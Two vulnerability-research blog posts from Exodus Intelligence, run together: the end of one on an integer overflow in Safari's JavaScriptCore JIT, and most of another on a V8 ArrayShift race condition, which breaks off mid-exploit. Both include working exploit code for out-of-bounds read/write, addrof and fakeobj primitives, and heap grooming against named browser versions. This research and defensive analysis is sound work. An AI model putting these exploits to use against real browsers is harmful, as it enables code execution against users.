In B3, the range of b at [2] is incorrectly calculated as [0, 0x7fff_ffff] (due to the integer overflow bug we discussed earlier). This leads to the incorrect lowering of c at [4] from CheckSub to Sub as B3 now assumes that the sub-operation never overflows. This breaks the assumptions made by DFG to remove the bounds check because it is possible for b - 0x7ffffff to overflow and attain a large positive value. When running the exploit, the value of b becomes0x7fff_ffff << 2 = 0xffff_fffc (it overflows and gets converted to 32-bit). This value is -4 in hex, and when -0x7fff_ffff is added to it at [4], a signed overflow happens: -4 - 0x7fff_ffff = 0x7ffffffd. Thus the value of c (which is already verified by DFG to be less than the array length) becomes more than array.length. This crashes JSC when it tries to use this huge value to do an out-of-bounds read.

On a side note, [5] (if (c < 0) c = 1) forces the JIT compilation of [7] even if the bug is not triggered, as otherwise [7] will never be executed (it is unreachable with normal inputs) when the main function is getting JIT-compiled.

Though this PoC crashes JSC, it is essentially an uncontrolled value and might not even crash as it is possible that the page that it is trying to read is mapped with read permissions. Thus, unless we want to spray gigabytes of memory to exploit the out-of-bounds read, we need to control this value for more stability and exploitability.

Controlling the Out-of-Bounds Read/Write

After some tests, we found that single decrements to the index do not break the assumptions made by the DFG optimizer. Hence to better control the out-of-bounds index, it can be single-decremented a desired number of times before the length check. The final version of the jit() function that provides full control over the out-of-bounds index, as well as functions in the Safari browser, is highlighted in the following PoC.

				
					function jit(idx, times,val){
    let a = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let big = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let new_ary = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
    let tmp = 13.37;
    let id = idx & 0x7fffffff;

[1]
    let b = id ﹤﹤ 2;
    
[2]
    if (b ﹤ a.length){ 
    
[3]
        let c = b - 0x7fffffff;
        
        // force jit else dfg will update with osrExit
        if (c ﹤ 0) c = 1; 
    
[4]
        // Single decerement the value of c
        while(c ﹥ 1){
            if(times ﹤= 0){
                break
            }else{
                c -= 1;
                times -= 1;
            }
        }
        
[5]
        if (c ﹥ 0){
[6]
            tmp = a[ c ];

[7]
            a[ c ] = val;
            return [big, tmp, new_ary];
        }
    }
}

function main(){

[8]
    for (let k=0; k﹤1000000; k++){jit(k %10,1,1.1);}
    let target_length = 7.82252528543333e-310;         // 0x900000008000

[9]
    print(jit(2147483647, 0x7ffffff0,target_length));
}
main()
				
			

The function jit() is JIT-compiled at [8]. There is no CheckInBounds for the array load at [6] for the reasons discussed above. The jit() call at [9] triggers the bug by passing a value of 0x7fffffff to the jitted function. When this is passed, the value of b at [1] becomes -4 (result of 0x7fffffff << 2 wrapped to 32 bits becomes 0xfffffffc). This is obviously less than a.length (b is negative, and it is a signed comparison) so it passes the check at [2]. The subtract operation at [3] does not check for overflow and results in c obtaining a large positive value (0x7ffffffd) due to an integer overflow. This can be further reduced to a controlled value by doing single decrements, which the while loop at [4] does. At the end of the loop, c contains a value of 0xd. Now this is greater than zero, so it passes the check at [5] and ends up in a controlled out-of-bounds read at [6] and an out-of-bounds write at [7]. This ends up corrupting the length field of the array that lies immediately after the array a (the big array) and sets its length and capacity to a huge value. This results in the big array being able to read/write out-of-bounds values over a large extent on the heap.

Note that in the above PoC, we are writing out of bounds to corrupt the length field of the big array. We are writing an 8-byte double value, so we write 0x9000_00008000 encoded as a double. The lower 4 bytes of this value (i.e. 0x8000) signify the length, and the upper 4 bytes (0x9000) is the capacity we are setting.

In order to control the OOB read, an attacker can just change the value of the times argument for the jit() function at [9]. Let us now leverage this to gain the addrof and fakeobj primitives!

The addrof and fakeobj Primitives

The addrof primitive allows us to get an object’s address, while the fakeobj primitive gives us the ability to load a crafted fake object. Refer to the Phrack article by Samuel Groß for more details.

The addrof primitive can be achieved by reading out of bounds from an ArrayWithDouble array to read an object pointer. The fakeobj primitive can be achieved by writing the address as a double into an ArrayWithContiguous array using an out-of-bounds read. The following leverages the bug we see to attain this.

The out-of-bounds write is used to corrupt the length and capacity of the big array which is adjacent to the array a. This provides an ability to do a clean out-of-bounds read/write into the new_ary array from the big array. After the length and capacity of the big array are corrupted, both the big and new_ary arrays are returned to the calling function.

Let the arrays returned from the jit() function be called oob_rw_ary and confusion_ary. Initially, both of them are of the ArrayWithDouble type. However, for the confusion_ary  array, we force a structure transition to the ArrayWithContiguous type.

				
					function pwn(){
log("started!")

    // optimize the buggy function
    for (let k=0; k﹤1000000; k++){jit_bug(k %10,1,1.1);}

    let oob_rw_ary = undefined;
    let target_length = 7.82252528543333e-310; // 0x900000008000
    let target_real_len = 0x8000
    let confusion_ary = undefined;

    // Trigger the oob write to edit the length of an array
    let res = jit_bug(2147483647, 0x7ffffff0,target_length)
    oob_rw_ary = res[0];
    confusion_ary = res[2];
    
    // Convert the float array to a jsValue array
    confusion_ary[1] = {}; 
    log(hex(f2i(res[1])) + " length -﹥ "+oob_rw_ary.length);

    if(oob_rw_ary.length != target_real_len){
        log("[-] exploit failed -&gt; bad array length; maybe not vulnerable?")
        return 1;
    }

    // index of confusion_ary[1]
    let confusion_idx = 15; 
}
				
			

At this point, the necessary setup for the addrof and fakeobj primitives is done. Since the oob_rw_ary array can go out of bounds to the confusion_ary array, it is possible to write object pointers as doubles into it.

The addrof primitive is achieved by writing an object to the confusion_ary array and then reading it out-of-bounds as a double from the oob_rw_ary array.

Similarly, the fakeobj primitive is implemented by writing an object pointer out-of-bounds as a double to the oob_rw_ary array and then reading it as an object from confusion_ary.

				
					
    function addrof(obj){
        let addr = undefined;
        confusion_ary[1] = obj;
        addr = f2i(oob_rw_ary[confusion_idx]);
        log("[addrof] -﹥ "+hex(addr));
        return addr;
    }

    function fakeobj(addr){
        let obj = undefined;
        log("[fakeobj] getting obj from -﹥ "+hex(addr));
        oob_rw_ary[confusion_idx] = i2f(addr)
        obj = confusion_ary[1];
        confusion_ary[1] = 0.0; // clear the cell
        log("[fakeobj] fakeobj ok");
        return obj
    }
				
			

And there we go! We have successfully converted the bug into a stable addrof and fakeobj primitives!

All together

Let us put all this together to see the full PoC that achieves the addrof and fakeobj from the initial bug:

				
					var convert = new ArrayBuffer(0x10);
var u32 = new Uint32Array(convert);
var u8 = new Uint8Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
let switch_var = 0;
function i2f(i) {
    u32[0] = i%BASE;
    u32[1] = i/BASE;
    return f64[0];
}

function f2i(f) {
    f64[0] = f;
    return u32[0] + BASE*u32[1];
}

function unbox_double(d) {
    f64[0] = d;
    u8[6] -= 1;
    return f64[0];
}

function hex(x) {
    if (x ﹤ 0)
        return `-${hex(-x)}`;
    return `0x${x.toString(16)}`;
}

function log(data){
    print("[~] DEBUG [~] " + data)
}


function pwn(){
	log("started!")

    /* The function that will trigger the overflow to corrupt the length of the following array */

    function jit_bug(idx, times,val){
        let a = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let big = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let new_ary = new Array(1.1,2.2,3.3,4.4,5.5,6.6,7.7,8.8,9.9,10.10,11.11);
        let tmp = 13.37;
        let id = idx & 0x7fffffff;
        let b = id ﹤﹤ 2;
        if (b ﹤ a.length){ 
            let c = b - 0x7fffffff;
            if (c ﹤ 0) c = 1; // force jit else dfg will update with osrExit
            while(c ﹥ 1){
                if(times == 0){
                    break
                }else{
                    c -= 1;
                    times -= 1;
                }
            }
            if (c ﹥ 0){
                tmp = a[ c ];
                a[ c ] = val;
                return [big, tmp, new_ary]
            }
        }
    }

    for (let k=0; k﹤1000000; k++){jit_bug(k %10,1,1.1);} // optimize the buggy function

    let oob_rw_ary = undefined;
    let target_length = 7.82252528543333e-310; // 0x900000008000
    let target_real_len = 0x8000
    let confusion_ary = undefined;

    // Trigger the oob write to edit the length of an array
    let res = jit_bug(2147483647, 0x7ffffff0,target_length)
    oob_rw_ary = res[0];
    confusion_ary = res[2];
    confusion_ary[1] = {}; // Convert the float array to a jsValue array
    log(hex(f2i(res[1])) + " length -﹥ "+oob_rw_ary.length);

    if(oob_rw_ary.length != target_real_len){
        log("[-] exploit failed -﹥ bad array length; maybe not vulnerable?")
        return 1;
    }

    let confusion_idx = 15; // index of confusion_ary[1]

    function addrof(obj){
        let addr = undefined;
        confusion_ary[1] = obj;
        addr = f2i(oob_rw_ary[confusion_idx]);
        log("[addrof] -﹥ "+hex(addr));
        return addr;
    }

    function fakeobj(addr){
        let obj = undefined;
        log("[fakeobj] getting obj from -﹥ "+hex(addr));
        oob_rw_ary[confusion_idx] = i2f(addr)
        obj = confusion_ary[1];
        confusion_ary[1] = 0.0; // clear the cell
        log("[fakeobj] fakeobj ok");
        return obj
    }

    /// Verify that addrof works
    let obj = {p1: 0x1337};
    // print the actual address of the object
    log(describe(obj));
    // Leak the address of the object
    log(hex(addrof(obj)));

    /// Verify that the fakeobj works. This will crash the engine
    log(describe(fakeobj(0x41414141)));
}
pwn();
				
			

This will leak the address of the obj object with addrof() and try to create a fake object on the address 0x41414141 which will end up crashing the engine. This should work on any version of a vulnerable JSC build.

Conclusion

We discussed a vulnerability we found in 2020 in the FTL JIT compiler, where an incorrect range computation led to an integer overflow. We saw how we could convert this integer overflow into a stable out-of-bounds read/write on the JavaScriptCore heap and use that to create the addrof and fakeobj primitives. These primitives allow a renderer code execution exploit on Intel Macs.

This bug was patched in the May 2021 update to Safari. The patch for this vulnerability is simple: if an overflow occurs, then the upper and lower bounds are set to the Max and Min value of that type respectively.

The vulnerability patch

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

About Exodus Intelligence

Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Shifting boundaries: Exploiting an Integer Overflow in Apple Safari appeared first on Exodus Intelligence.

Google Chrome V8 ArrayShift Race Condition Remote Code Execution

16 May 2023 at 22:36

By Javier Jimenez

Overview

This post describes a method of exploiting a race condition in the V8 JavaScript engine, version 9.1.269.33. The vulnerability affects the following versions of Chrome and Edge:

  • Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.
  • Microsoft Edge versions between 90.0.818.39 and 91.0.864.41.

The vulnerability occurs when one of the TurboFan jobs generates a handle to an object that is being modified at the same time by the ArrayShift built-in, resulting in a use-after-free (UaF) vulnerability. Unlike traditional UaFs, this vulnerability occurs within garbage-collected memory (UaF-gc). The bug lies within the ArrayShift built-in, as it lacks the necessary checks to prevent modifications on objects while other TurboFan jobs are running.

This post assumes the reader is familiar with all the elementary concepts needed to understand V8 internals and general exploitation. The references section contains links to blogs and documentation that describe prerequisite concepts such as TurboFan, Generational Garbage Collection, and V8 JavaScript Objects’ in-memory representation.

Table of Contents

The Vulnerability

When the ArrayShift built-in is called on an array object via Array.prototype.shift(), the length and starting address of the array may be changed while a compilation and optimization (TurboFan) job in the Inlining phase executes concurrently. When TurboFan reduces an element access of this array in the form of array[0], the function ReduceElementLoadFromHeapConstant() is executed on a different thread. This element access points to the address of the array being shifted via the ArrayShift built-in. If the ReduceElementLoadFromHeapConstant() function runs just before the shift operation is performed, it results in a dangling pointer. This is because Array.prototype.shift()frees” the object to which the compilation job still “holds” a reference. Both “free” and “hold” are not 100% accurate terms in this garbage collection context, but they serve the purpose of explaining the vulnerability conceptually. Later we describe these actions more accurately as “creating a filler object” and “creating a handler” respectively.

ReduceElementLoadFromHeapConstant() is a function that is called when TurboFan tries to optimize code that loads a value from the heap, such as array[0]. Below is an example of such code:

				
					function main() {
  let arr = new Array(500).fill(1.1);

  function load_elem() {
    let value = arr[0];
    for (let v19 = 0; v19 ﹤ 1500; v19++) {}
  }

  for (let i = 0; i ﹤ 500; i++) {
    load_elem();
  }
}
main();

				
			

By running the code above in the d8 shell with the command ./d8 --trace-turbo-reduction we observe, that the JSNativeContextSpecialization optimization, to which ReduceElementLoadFromHeapConstant() function belongs to, kicks in on node #27 by taking node #57 as its first input. Node #57  is the node for the array arr:

				
					$ ./d8 --trace-opt --trace-turbo-reduction /tmp/loadaddone.js
[TRUNCATED]
- Replacement of #13: JSLoadContext[0, 2, 1](3, 7) with #57: HeapConstant[0x234a0814848d ﹤JSArray[500]﹥] by reducer JSContextSpecialization
- Replacement of #27: JSLoadProperty[sloppy, FeedbackSource(#0)](57, 23, 4, 3, 28, 24, 22) with #64: CheckFloat64Hole[allow-return-hole, FeedbackSource(INVALID)](63, 63, 22) by reducer JSNativeContextSpecialization
[TRUNCATED]

				
			

Therefore, executing the Array.prototype.shift() method on the same array, arr, during the execution of the aforementioned TurboFan job may trigger the vulnerability. Since this is a race condition, the vulnerability may not trigger reliably. The reliability depends on the resources available for the V8 engine to use.

The following is a minimal JavaScript test case that triggers a debug check on a debug build of d8:

				
					function main() {
  let arr = new Array(500).fill(1.1);

  function bug() {

// [1]

    let a = arr[0];

// [2]
    
    arr.shift();
    for (let v19 = 0; v19 &lt; 1500; v19++) {}
  }

// [3]

  for (let i = 0; i &lt; 500; i++) {
    bug();
  }
}

main();
				
			

The loop at [3] triggers the compilation of the bug() function since it’s a “hot” function. This starts a concurrent compilation job for the function where [1] will force a call to ReduceElementLoadFromHeapConstant(), to reduce the load at index 0 for a constant value. While TurboFan is running on a different thread, the main thread executes the shift operation on the same array [2], modifying it. However, this minimized test case does not trigger anything further than an assertion (via DCHECK) on debug builds. Although the test case executes without fault on a release build, it is sufficient to understand the rest of the analysis.

The following numbered steps show the order of execution of code that results in the use-after-free. The end result, at step 8, is the TurboFan thread pointing to a freed object:

Steps in use-after-free
Triggering the race condition

In order to achieve a dangling pointer, let’s figure out how each thread holds a reference in V8’s code.

Reference from the TurboFan Thread

Once the TurboFan job is fired, the following code will get executed:

				
					// src/compiler/js-native-context-specialization.cc 

Reduction JSNativeContextSpecialization::ReduceElementLoadFromHeapConstant(
    Node* node, Node* key, AccessMode access_mode,
    KeyedAccessLoadMode load_mode) {

[TRUNCATED]

  HeapObjectMatcher mreceiver(receiver);
  HeapObjectRef receiver_ref = mreceiver.Ref(broker());

[TRUNCATED]

[1]

  NumberMatcher mkey(key);
  if (mkey.IsInteger() &&;
      mkey.IsInRange(0.0, static_cast(JSObject::kMaxElementIndex))) {
    STATIC_ASSERT(JSObject::kMaxElementIndex &lt;= kMaxUInt32);
    const uint32_t index = static_cast(mkey.ResolvedValue());
    base::Optional element;

    if (receiver_ref.IsJSObject()) {

[2]

      element = receiver_ref.AsJSObject().GetOwnConstantElement(index);

[TRUNCATED]  
				
			

Since this reduction is done via ReducePropertyAccess() there is an initial check at [1] to know whether the access to be reduced is actually in the form of an array index access and whether the receiver is a JavaScript object. After that is verified, the GetOwnConstantElement() method is called on the receiver object at [2] to retrieve a constant element from the calculated index.

				
					// src/compiler/js-heap-broker.cc

base::Optional﹤ObjectRef﹥ JSObjectRef::GetOwnConstantElement(
    uint32_t index, SerializationPolicy policy) const {

[3]

  if (data_-&gt;should_access_heap() || FLAG_turbo_direct_heap_access) {

[TRUNCATED]

[4]

    base::Optional﹤FixedArrayBaseRef﹥ maybe_elements_ref = elements();

[TRUNCATED]

				
			

The code at [3] verifies whether the current caller should access the heap. The verification passes since the reduction is for loading an element from the heap. The flag FLAG_turbo_direct_heap_access is enabled by default. Then, at [4] the elements() method is called with the intention of obtaining a reference to the elements of the receiver object (the array). The  elements() method is shown below:

				
					// src/compiler/js-heap-broker.cc
base::Optional JSObjectRef::elements() const {
  if (data_-&gt;should_access_heap()) {

[5]

    return FixedArrayBaseRef(
        broker(), broker()-&gt;CanonicalPersistentHandle(object()-&gt;elements()));
  }

[TRUNCATED]

// File: src/objects/js-objects-inl.h
DEF_GETTER(JSObject, elements, FixedArrayBase) {
  return TaggedField::load(cage_base, *this);
}
				
			

Further down the call stack, elements() will call CanonicalPersistentHandle() with a reference to the elements of the receiver object, denoted by object()->elements() at [5]. This elements() method call is different than the previous. This one directly accesses the heap and returns the pointer within the V8 heap. It accesses the same pointer object in memory as the ArrayShift built-in.

Finally, CanonicalPersistentHandle() will create a Handle reference. Handles in V8 are objects that are exposed to the JavaScript environment. The most notable property is that they are tracked by the garbage collector.

				
					// File: src/compiler/js-heap-broker.h

  template ﹤typename T﹥
  Handle﹤T﹥ CanonicalPersistentHandle(T object) {
    if (canonical_handles_) {

[TRUNCATED]

    } else {

[6]

      return Handle﹤T﹥(object, isolate());
    }
  }
				
			

The Handle created at [6] is now exposed to the JavaScript environment and a reference is held while the compilation job is being executed. At this point, if any other parts of the process modify the reference, for example, forcing a free on it, the TurboFan job will hold a dangling pointer. Exploiting the vulnerability relies on this behavior. In particular, knowing the precise point when the TurboFan job runs allows us to keep the bogus pointer within our reach.

Reference from the Main Thread (ArrayShift Built-in)

Once the code depicted in the previous section is running and it passes the point where the Handle to the array was created, executing the ArrayShift JavaScript function on the same array triggers the vulnerability. The following code is executed:

				
					// File: src/builtins/builtins-array.cc

BUILTIN(ArrayShift) {
  HandleScope scope(isolate);

  // 1. Let O be ? ToObject(this value).
  Handle receiver;

[1]

  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, receiver, Object::ToObject(isolate, args.receiver()));

[TRUNCATED]

  if (CanUseFastArrayShift(isolate, receiver)) {

[2]

    Handle array = Handle::cast(receiver);
    return *array-&gt;GetElementsAccessor()-&gt;Shift(array);
  }

[TRUNCATED]

}
				
			

At [1], the receiver object (arr in the original JavaScript test case) is assigned to the receiver variable via the ASSIGN_RETURN_FAILURE_ON_EXCEPTION macro. It then uses this receiver variable [2] to create a new Handle of the JSArray type in order to call the Shift() function on it.

Conceptually, the shift operation on an array performs the following modifications to the array in the V8 heap:

ArrayShift operation on an Array of length 8

Two things change in memory: the pointer that denotes the start of the array is incremented, and the first element is overwritten by a filler object (which we referred to as “freed”). The filler is a special type of object described further below. With this picture in mind, we can continue the analysis with a clear view of what is happening in the code.

Prior to any manipulations of the array object, the following function calls are executed, passing the array (now of Handle<JSArray> type) as an argument:

				
					// File: src/objects/elements.cc

  Handle﹤Object﹥ Shift(Handle﹤JSArray﹥ receiver) final {

[3]

    return Subclass::ShiftImpl(receiver);
  }

[TRUNCATED]

  static Handle﹤Object﹥ ShiftImpl(Handle﹤JSArray﹥ receiver) {

[4]

    return Subclass::RemoveElement(receiver, AT_START);
  }

[TRUNCATED]

static Handle﹤Object﹥ RemoveElement(Handle﹤JSArray﹥ receiver,
                                      Where remove_position) {

[TRUNCATED]

[5]

    Handle﹤FixedArrayBase﹥ backing_store(receiver-﹥elements(), isolate);

[TRUNCATED]

    if (remove_position == AT_START) {

[6]

      Subclass::MoveElements(isolate, receiver, backing_store, 0, 1, new_length,
                             0, 0);
    }

[TRUNCATED]

}
				
			

Shift() at [3] simply calls ShiftImpl(). Then, ShiftImpl() at [4] calls RemoveElement(), passing the index as a second argument within the AT_START variable. This is to depict the shift operation, reminding us that it deletes the first object (index position 0) of an array.

Within the RemoveElement() function, the elements() function from the src/objects/js-objects-inl.h file is called again on the same receiver object and a Handle is created and stored in the backing_store variable. At [5] we see how the reference to the same object as the previous TurboFan job is created.

Finally, a call to MoveElements() is made [6] in order to perform the shift operation.

				
					// File: src/objects/elements.cc

  static void MoveElements(Isolate* isolate, Handle﹤JSArray﹥ receiver,
                           Handle﹤FixedArrayBase﹥ backing_store, int dst_index,
                           int src_index, int len, int hole_start,
                           int hole_end) {
    DisallowGarbageCollection no_gc;

[7]

    BackingStore dst_elms = BackingStore::cast(*backing_store);
    if (len ﹥ JSArray::kMaxCopyElements && dst_index == 0 &&

[8]

        isolate-﹥heap()-﹥CanMoveObjectStart(dst_elms)) {
      dst_elms = BackingStore::cast(

[9]

          isolate-﹥heap()-﹥LeftTrimFixedArray(dst_elms, src_index));

[TRUNCATED]
				
			

In MoveElements(), the variables dst_index and src_index hold the values 0 and 1 respectively, since the shift operation will shift all the elements of the array from index 1, and place them starting at index 0, effectively removing position 0 of the array. It starts by casting the backing_store variable to a BackingStore object and storing it in the dst_elms variable [7]. This is done to execute the CanMoveObjectStart() function, which checks whether the array can be moved in memory [8]. 

This check function is where the vulnerability resides. The function does not check whether other compilation jobs are running. If such a check passes, dst_elms (the reference to the elements) of the target array, will be passed onto LeftTrimFixedArray(), which will perform modifying operations on it.

				
					// File: src/heap/heap.cc

[10]

bool Heap::CanMoveObjectStart(HeapObject object) {
  if (!FLAG_move_object_start) return false;

  // Sampling heap profiler may have a reference to the object.
  if (isolate()-﹥heap_profiler()-﹥is_sampling_allocations()) return false;

  if (IsLargeObject(object)) return false;

  // We can move the object start if the page was already swept.
  return Page::FromHeapObject(object)-﹥SweepingDone();
}
				
			

In a vulnerable V8 version, we can see that while the CanMoveObjectStart() function at [10] checks for things such as the profiler holding references to the object or the object being a large object, the function does not contain any checks for concurrent compilation jobs. Therefore all checks will pass and the function will return True, leading to the LeftTrimFixedArray() function call with dst_elms as the first argument.

				
					// File: src/heap/heap.cc

FixedArrayBase Heap::LeftTrimFixedArray(FixedArrayBase object,
                                        int elements_to_trim) {

[TRUNCATED]

  const int element_size = object.IsFixedArray() ? kTaggedSize : kDoubleSize;
  const int bytes_to_trim = elements_to_trim * element_size;

[TRUNCATED]

[11]

  // Calculate location of new array start.
  Address old_start = object.address();
  Address new_start = old_start + bytes_to_trim;

[TRUNCATED]

[12]

  CreateFillerObjectAt(old_start, bytes_to_trim,
                       MayContainRecordedSlots(object)
                           ? ClearRecordedSlots::kYes
                           : ClearRecordedSlots::kNo);

[TRUNCATED]

#ifdef ENABLE_SLOW_DCHECKS
  if (FLAG_enable_slow_asserts) {
    // Make sure the stack or other roots (e.g., Handles) don't contain pointers
    // to the original FixedArray (which is now the filler object).
    SafepointScope scope(this);
    LeftTrimmerVerifierRootVisitor root_visitor(object);
    ReadOnlyRoots(this).Iterate(&root_visitor);

[13]

    IterateRoots(&root_visitor, {});
  }
#endif  // ENABLE_SLOW_DCHECKS

[TRUNCATED]
}
				
			

At [11] the address of the object, given as the first argument to the function, is stored in the old_start variable. The address is then used to create a Fillerobject [12]. Fillers, in garbage collection, are a special type of object that serves the purpose of denoting a free space without actually freeing it, but with the intention of ensuring that there is a contiguous space of objects for a garbage collection cycle to iterate over. Regardless, a Filler object denotes a free space that can later be reclaimed by other objects. Therefore, since the compilation job also has a reference to this object’s address, the optimization job now points to a Filler object which, after a garbage collection cycle, will be a dangling pointer.

For completion, the marker at [13] shows the place where debug builds would bail out. The IterateRoots() function takes a variable created from the initial object (dst_elms) as an argument, which is now a Filler, and checks whether there is any other part in V8 that is holding a reference to it. In the case there is a running compilation job holding said reference, this function will crash the process on debug builds.

Exploitation

Exploiting this vulnerability involves the following steps:

  • Triggering the vulnerability by creating an Array barr and forcing a compilation job at the same time as the ArrayShift built-in is called.
  • Triggering a garbage collection cycle in order to reclaim the freed memory with Array-like objects, so that it is possible to corrupt their length.
  • Locating the corrupted array and a marker object to construct the addrof, read, and write primitives.
  • Creating and instantiating a wasm instance with an exported main function, then overwriting the main exported function’s shellcode.
  • Finally, calling the exported main function, running the previously overwritten shellcode.

After reclaiming memory, there’s the need to find certain markers in memory, as the objects that reclaim memory might land at different offsets every time. Due to this, should the exploit fail to reproduce, it needs to be restarted to either win the race or correctly find the objects in the reclaimed space. The possible causes of failure are losing the race condition or the spray not being successful at placing objects where they’re needed.

Triggering the Vulnerability

Again, let’s start with a test case that triggers an assert in debug builds. The following JavaScript code triggers the vulnerability, crashing the engine on debug builds via a DCHECK_NE statement:

				
					 function trigger() {

[1]

    let buggy_array_size = 120;
    let PUSH_OBJ = [324];
    let barr = [1.1];
    for (let i = 0; i ﹤ buggy_array_size; i++) barr.push(PUSH_OBJ);

    function dangling_reference() {

[2]

      barr.shift();
      for (let i = 0; i ﹤ 10000; i++) { console.i += 1; }
      let a = barr[0];

[3]

      function gcing() {
        const v15 = new Uint8ClampedArray(buggy_array_size*0x400000);
      }
      let gcit = gcing();
      for (let v19 = 0; v19 ﹤ 500; v19++) {}
    }

[4]

    for (let i = 0; i ﹤ 4; i++) {
      dangling_reference();
    }
 }

trigger();
				
			

Trigerring the vulnerabiliy comprises the following steps:

  • At [1] an array barr is created by pushing objects PUSH_OBJ into it. These serve as a marker at later stages.
  • At [2] the bug is triggered by performing the shift on the barr array. A for loop triggers the compilation early, and a value from the array is loaded to trigger the right optimization reduction.
  • At [3] the gcing() function is responsible for triggering a garbage collection after each iteration. When the vulnerability is triggered, the reference to barr is freed. A dangling pointer is then held at this point.
  • At [4] there is the need to stop executing the function to be optimized exactly on the iteration that it gets optimized. The concurrent reference to the Filler object is obtained only at this iteration.

Reclaiming Memory and Corrupting an Array Length

The next excerpt of the code explains how the freed memory is reclaimed by the desired arrays in the full exploit. The goal of the following code is to get the elements of barr to point to the tmpfarr and tmpMarkerArray objects in memory, so that the length can be corrupted to finally build the exploit primitives.

Leveraging the barr array

The above image shows how the elements of the barr array are altered throughout the exploit. We can see how, in the last state, barr‘s elements point to the in-memory JSObjects tmpfarr and tmpArrayMarker, which will allow corrupting their lengths via statements like barr[2] = 0xffff. Bear in mind that the images are not comprehensive. JSObjects represented in memory contain fields, such as Map or array length, that are not shown in the above image. Refer to the References section for details on complete structures.

				
					let size_to_search = 0x8c;
let next_size_to_search = size_to_search+0x60;
let arr_search = [];
let tmparr = new Array(Math.floor(size_to_search)).fill(9.9);
let tmpMarkerArray =  new Array(next_size_to_search).fill({
  a: placeholder_obj, b: placeholder_obj, notamarker: 0x12341234, floatprop: 9.9
});
let tmpfarr= [...tmparr];
let new_corrupted_length = 0xffff;

for (let v21 = 0; v21 ﹤ 10000; v21++) {

[1]

  arr_search.push([...tmpMarkerArray]);
  arr_search.push([...tmpfarr]);

[2]

  if (barr[0] != PUSH_OBJ) {
    for (let i = 0; i ﹤ 100; i++) {

[3]

      if (barr[i] == size_to_search) {

[4]

        if (barr[i+12] != next_size_to_search) continue;

[5]

        barr[i] = new_corrupted_length;
        break;
      }
    }
    break;
  }
}

for (let i = 0; i ﹤ arr_search.length; i++) {

[6]

  if (arr_search[i]?.length == new_corrupted_length) {
    return [arr_search[i], {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337
    }];
  }
}
				
			

In the following, we describe the above code that alters barr‘s element as shown in the previous figure.

  • Within a loop at [1], several arrays are pushed into another array with the intention of reclaiming the previously freed memory. These actions trigger garbage collection, so that when the memory is freed, the object is moved and overwritten by the desired arrays (tmpfarr and tmpMarkerArray).
  • The check at [2] observes that the array no longer contains any of the initial values pushed. This means that the vulnerability has been triggered correctly and barr now points to some other part of memory.
  • The intention of the check at [3] is to identify the array element that holds the length of the tmpfarr array.
  • The check at [4] verifies that the adjacent object has the length for tmpMarkerArray.
  • The length of the tmpfarr is then overwritten at [5] with a large value, so that it can be used to craft the exploit primitives.
  • Finally at [6], a search for the corrupted array object is performed by querying for the new corrupted length via the JavaScript length property. One thing to note is the optional chaining ?. This is needed here because arr_search[i] might be an undefined value without the length property, breaking JavaScript execution. Once found, the corrupted array is returned.

Creating and Locating the Marker Object

Once the length of an array has been corrupted, it allows reading and writing out-of-bounds within the V8 heap. Certain constraints apply, as reading too far could cause the exploit to fail. Therefore a cleaner way to read-write within the V8 heap and to implement exploit primitives such as addrof is needed.

				
					[1]

for (let i = size_to_search; i ﹤ new_corrupted_length/2; i++) {

[2]

  for (let spray = 0; spray ﹤ 50; spray++) {
    let local_findme = {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337, findyou:0x12341234
    };
    objarr.push(local_findme);
    function gcing() {
      const v15 = new String("Hello, GC!");
    }
    gcing();
  }
  if (marker_idx != -1) break;

[3]

  if (f2string(cor_farr[i]).includes("22222222")){
    print(`Marker at ${i} =﹥ ${f2string(cor_farr[i])}`);
    let aux_ab = new ArrayBuffer(8);
    let aux_i32_arr = new Uint32Array(aux_ab); 
    let aux_f64_arr = new Float64Array(aux_ab);
    aux_f64_arr[0] = cor_farr[i];

[4]

    if (aux_i32_arr[0].toString(16) == "22222222") {
      aux_i32_arr[0] = 0x44444444;
    } else {
      aux_i32_arr[1] = 0x44444444;
    }
    cor_farr[i] = aux_f64_arr[0];

[5]

    for (let j = 0; j ﹤ objarr.length; j++) {
      if (objarr[j].findme != 0x11111111) {
        leak_obj = objarr[j];
        if (leak_obj.findme != 0x11111111) {
          print(`Found right marker at ${i}`);
          marker_idx = i;
          break;
        }
      }
    }
    break;
  }
}
				
			
  • A for loop [1] traverses the array with corrupted length cor_farr. Note that this is one of the parts of potential failure in the exploit. Traversing too far into the corrupted array will likely result in a crash due to reading past the boundaries of the memory page. Thus, a value such as new_corrupted_length/2 was selected at the time of development which was the output of several tests.
  • Before starting to traverse the corrupted array, a minimal memory spray is attempted at [2] in order to have the wanted local_findme object right in the memory pointed by cor_farr. Furthermore, garbage collection is triggered in order to trigger compaction of the newly sprayed objects with the intention of making them adjacent to cor_farr elements.
  • At [3] f2string converts the float value of cor_farr[i] to a string value. This is then checked against the value 22222222 because V8 represents small integers in memory with the last bit set to 0 by left shifting the actual value by one. So 0x11111111 << 1 == 0x22222222 which is the memory value of the small integer property local_findme.findme. Once the marker value is found, several “array views” (Typed Arrays) are constructed in order to change the 0x22222222 part and not the rest of the float value. This is done by creating a 32-bit view aux_i32_arr and a 64-bit aux_f64_arr view on the same buffer aux_ab.
  • A check is performed at [4] to know wether the marker is found in the higher or the lower 32-bit. Once determined, the value is changed for 0x44444444 by using the auxiliary array views.
